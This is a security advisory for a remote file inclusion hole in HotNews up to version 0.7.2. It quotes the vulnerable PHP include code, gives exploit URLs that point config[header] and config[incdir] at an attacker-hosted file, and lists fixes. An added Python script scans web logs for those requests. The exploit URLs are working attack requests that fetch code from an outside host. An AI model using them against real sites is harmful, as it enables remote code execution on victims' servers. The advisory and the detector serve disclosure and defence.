HotNews arbitrary file inclusion.
===+++===+++===+++

Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr@poligon.com.pl>
Vendor Response: Not contacted yet.
===+++===+++===+++

Problem #1:
===+++===+++===+++
An attacker can include any file from a remote or the local server.

PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
    include($config["header"]);
}
[...]

PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
    include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]

Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
etc...

Fix #1:
===+++===+++===+++
Turn off global_variables (the register_globals setting in php.ini).

Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.

--
Regards,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator>
<gg: 516354>
"Living on a razors edge, Balancing on a ledge"
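
Added example (not part of the original advisory or of HotNews): a check over web server access logs for the request pattern described above, namely direct requests to `.inc.php3` files and `config[...]` parameters supplied by the client. It assumes Apache common/combined log format; the log lines are constructed, with documentation addresses and placeholder host names.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request field of an Apache common/combined log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Include files are meant to be pulled in by other scripts, not requested directly.
INCLUDE_RE = re.compile(r'\.inc\.php3?$', re.IGNORECASE)
# With register_globals on, a config[...] request parameter seeds $config.
CONFIG_KEY_RE = re.compile(r'^config\[')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /news.php3 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Jan/2003:10:00:05 +0000] "GET /includes/hnmain.inc.php3'
    '?config[incdir]=http://host.example/ HTTP/1.0" 200 312',
    '192.0.2.44 - - [01/Jan/2003:10:00:09 +0000] "GET /includes/hotnews-engine.inc.php3'
    '?config%5Bheader%5D=HTTP%3A%2F%2Fhost.example%2Fx.txt HTTP/1.0" 200 99',
    '192.0.2.51 - - [01/Jan/2003:10:02:00 +0000] "GET /includes/hnmain.inc.php3'
    '?config[incdir]=/tmp/ HTTP/1.0" 200 0',
    '192.0.2.60 - - [01/Jan/2003:10:03:00 +0000] "GET /includes/func.inc.php3 HTTP/1.0" 403 210',
]

def classify(line):
    """Return None, 'direct-include', 'config-override' or 'remote-include'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition('?')
    verdict = 'direct-include' if INCLUDE_RE.search(unquote(path)) else None
    # parse_qsl percent-decodes keys and values, so config%5Bheader%5D is caught.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if CONFIG_KEY_RE.match(key):
            if REMOTE_RE.match(value.strip()):
                return 'remote-include'
            verdict = 'config-override'
    return verdict

def scan(lines):
    """Return (verdict, line) for every log line that needs a look."""
    hits = [(classify(line), line) for line in lines]
    return [(v, line) for v, line in hits if v]

if __name__ == '__main__':
    for verdict, line in scan(SAMPLE_LOG):
        print(f'{verdict:16} {line}')
```

A `direct-include` hit answered with a 200 status also shows that Fix #2 is not in place on that host.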